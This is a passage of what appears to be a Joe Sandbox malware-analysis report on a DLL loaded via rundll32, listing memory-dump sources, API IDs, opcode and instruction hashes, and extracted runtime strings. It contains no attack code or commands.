                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                      • Opcode ID: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                                                                      • Instruction ID: 5a83c5ab05cee1c7ca4d4e455f1847183a59f8df054b8253cdf5b2a9690f84c5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce38d37ca8cf5b7d06ded007de5ea175a415d9990679de99291eeea22f5aae
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A51E8772087498BEB60CF1AE09076BB7A1F7D9B85F084429EB8D87764DB78D951CB00
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2476801129.00007DF459570000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF459570000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_7df459570000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3280610774-0
                                                                                                                                                                                                                                                                      • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                                                                      • Instruction ID: e4be21fc8f3a31bf69686a896177be1d3a99fab218a27e6d591dc2c4ca804d74
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E21BC3161494C8FEBA1EB6CC858BEE33F1EB98324F404226D81EDB390DF35AA548750

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                                                                      • Instruction ID: 034058dcfac0be73e41e1ce4e32a0b78802e9ba4219920122c8c9e2249a0ebd9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 816fc88231aa2467bf2252115963d1d14762f6c5c40f282537df11a36abcc1ab
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9451F976618B44C6CB60CB1AE48066AB7A0F7DCBD9F045529EF8E83B69DB78C551CF00

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateMutex
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1964310414-0
                                                                                                                                                                                                                                                                      • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                                                                      • Instruction ID: 6862be4e439ccb645563a6e5f29d30fd4cadaef51fe3b6c6d1067ab883b70bcc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79E12171408A0D8FE751EF14E895BE6BBF4F768340F20067FE84AC2561DB789246CB86

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 572 1ff4cafb4e0-1ff4cafb4ee 573 1ff4cafb523-1ff4cafb52f 572->573 574 1ff4cafb4f0-1ff4cafb505 572->574 574->573 576 1ff4cafb507-1ff4cafb51d call 1ff4caf4ce0 RtlFreeHeap 574->576 576->573
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                      • Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                                                                      • Instruction ID: ed276b1bcd8c0be45a6a05f00a00274ac9410e2bcf3dcb6a42514b1c9a1f4389
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90F01C30310E098BFB58E7BABCD87B237E2FB9C341B4580A4A406C6194EB789842C711

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      control_flow_graph 579 273f414d0-273f414dc 580 273f414e0-273f414e7 SleepEx 579->580 580->580
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                      • Opcode ID: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                                                                      • Instruction ID: 0bf00bace8f2674ea540bcf736f3f2282d979a864102f6c7b7d6f84e33ec7844
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 490134546b41fa5f3525d4fc16026bee51ec6a607ddd3dfaa8bb0cc5ac4d8099
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06B09B14F04594C7E2255791B44D7699610B74FBD1F249451C55D13755851455425702
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                                                                      • Instruction ID: 8734ce49c56e95ebc2df2b3fd8fe03f30472c91dd89aa18a18fb1262231a6cf2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31D092B6B1468087DB289B25E451A0BBB60F799744F904129EB8D57B68CA3EC6168F04
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                      • Opcode ID: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                                                                      • Instruction ID: abfc01c1cae31b126f3606ba6e35873ac6e2165b9242cca6e17ef92ae9629bfb
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d65eaab545a1f0b3e028d40bc848e10c731a40ca7154dd932d5894c03336bdee
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE1A076204A898BE7B6CF15D488BD937A0F39D7CCF529016EB0947B84DB35CA09CB45
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                                                                                      • Opcode ID: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                                      • Instruction ID: c11a1434eabf13ff3ffc717c65629f10aad66df5d482a187dde0986ab906fb0d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aae69b84937ae52c50460b3a93fd80386282a716ad85a420871dc6e10509decd
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55A1BDB2200A848BE7FA8F55E590BD977A0F3697CCF41D116EB4A57B84CB34CA48CB05
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                                                                                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                                                                                                                      • API String ID: 1791977518-905460609
                                                                                                                                                                                                                                                                      • Opcode ID: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                                      • Instruction ID: 68df83c6e16fb6719a30522dc5a7a3ce8abf960c58eb50addb9b285837f9a530
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a78d7057517b415f687703166ca4a3cfcdca313bed36a1596b117302a90adb15
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF91AB32200B4986EBA69F21D5513E923A5FB8DBC4F54C121FE5867786EF3AC759C700
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2591520935-0
                                                                                                                                                                                                                                                                      • Opcode ID: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                                      • Instruction ID: 64d13e85883def1e901923d6c9018b7936bb528f0590fea9e49b5af43c603379
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20717C72710B0889FBA29B61D8527EC23B4BB4C7C8F44C526BA19677D5EF3A864DC350
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                                      • Instruction ID: 483f6a83d11dcc029adc45c6f3cb0b9be83de0b0cb0aa062e5b1d14df8a2b4d4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D319236204F8486EBA1CF25E8443EE73A4F788798F504126FA8D53B99DF39C659CB00
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                                                                      • Opcode ID: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                                      • Instruction ID: aba4e943f25002773c1e8b8ff256808fc8ff7469cd32bafab8b6d36a2db658ad
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E024E72A10F18D8FBA6CB68D8953ED27B1B31D7C4F608119EA091AAA8DF74C74DC740
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID: `anonymous namespace'
                                                                                                                                                                                                                                                                      • API String ID: 3863519203-3062148218
                                                                                                                                                                                                                                                                      • Opcode ID: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                                      • Instruction ID: 780ad3a83c53e58fc5f4bcda82df12fb3de2ceedc09e18eee4d15cf768c518c0
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2E14872604B8899EBA28F64E8803DD77B1F349788F908115FA8D17B96DF38C659C740
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::$Name::operator+swprintf
                                                                                                                                                                                                                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                                      • Opcode ID: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                                      • Instruction ID: 634aa9d0042bbda353e8cc45d4c8daf7f92220045ba3d69c75e7207222ffe171
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C412B032A0418D86FBA76E15F0443EB77A1F788B94F96C116F68647AC4DF78C688CB00
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: -$0$f$p$p
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                                                                      • Opcode ID: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                                      • Instruction ID: 93a9ff39d45d2419c6a7fc755833649a49288bc20d1d0bfe1c27cd3576f2de20
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E612E331A042DA86FBA39B14D0543EB7791F35ABD4F9AC312F696476C4DF38C6888B10
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                                                                      • Opcode ID: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                                      • Instruction ID: 11c260e0c16152af3f3440f9639a3bccbf9e6650033c1e5fc3f0bfcfe7c7928e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30513872B14F5898FB928B60D8803ED77B0B70C788F548125EE5923B96DF788389C710
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                      • String ID: -$f$p$p
                                                                                                                                                                                                                                                                      • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                                                                      • Opcode ID: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                                      • Instruction ID: 3b4b050498cdcb5f336cd356739b46ea81abb083d02af334d156d32d0928b2a6
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B12A27160438A86FBA39B14E0447EA7762F3587D4FF4C115F6D246AC6DF39CA888B05
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                      • Opcode ID: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                                      • Instruction ID: d2b285feaf2a7c9902849b73c345f52bfdc77f3075a64cd68fdca09590970db2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23D18D32604B488AEBA2DB25D4807DD3BA0F7497C8F008216FF8957B96CF34D689C701
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482EB
                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482F7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                                                                      • Instruction ID: 950cb933599524e4be349329b0f14d28e915af748e4a11c5b25ef056b0586ea4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C941F231311E0881FAA7CB16AD403DA2396BB4DBE4F49C925BE1A97784EE3CC64D9344
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: QueryVirtual
                                                                                                                                                                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                                                                                                                      • API String ID: 1804819252-1534286854
                                                                                                                                                                                                                                                                      • Opcode ID: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                                                                      • Instruction ID: 663189738c40874af7135dc25b0b982f4eec5aa8fa6ad61ed8319b582aa1f326
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0cce06267e1579f90ae27719d32f235d794723324326edd454bf682594529e94
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB41AF72F08F4482EB14DB51E8497DA77A0F789BE0F644220DA4D07BA5EB38C685E742
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 2559590344-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
